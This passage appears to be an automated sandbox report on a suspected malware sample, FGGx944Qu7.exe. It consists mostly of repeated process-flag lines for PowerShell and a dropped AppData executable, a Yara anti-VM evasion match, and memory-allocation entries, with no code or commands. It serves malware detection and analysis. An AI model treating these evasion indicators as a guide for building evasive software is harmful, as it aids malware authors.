Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\SearchProtocolHost.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: FGGx944Qu7.exe PID: 7252, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: TBsjWljiCpR.exe PID: 7680, type: MEMORYSTR

Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Memory allocated: 15E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Memory allocated: 3010000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Memory allocated: 2DA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Memory allocated: 6290000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Memory allocated: 7290000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Memory allocated: 73C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Memory allocated: 83C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Memory allocated: 8620000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Memory allocated: 9620000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Memory allocated: A620000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Memory allocated: B620000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Memory allocated: C270000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Memory allocated: D270000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\FGGx944Qu7.exe	Memory allocated: E270000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Memory allocated: 1610000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Memory allocated: 3090000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Memory allocated: 2EA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Memory allocated: 6150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Memory allocated: 7150000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Memory allocated: 7280000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Memory allocated: 8280000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Memory allocated: 84D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\TBsjWljiCpR.exe	Memory allocated: 94D0000 memory reserve \| memory write watch	Jump to behavior
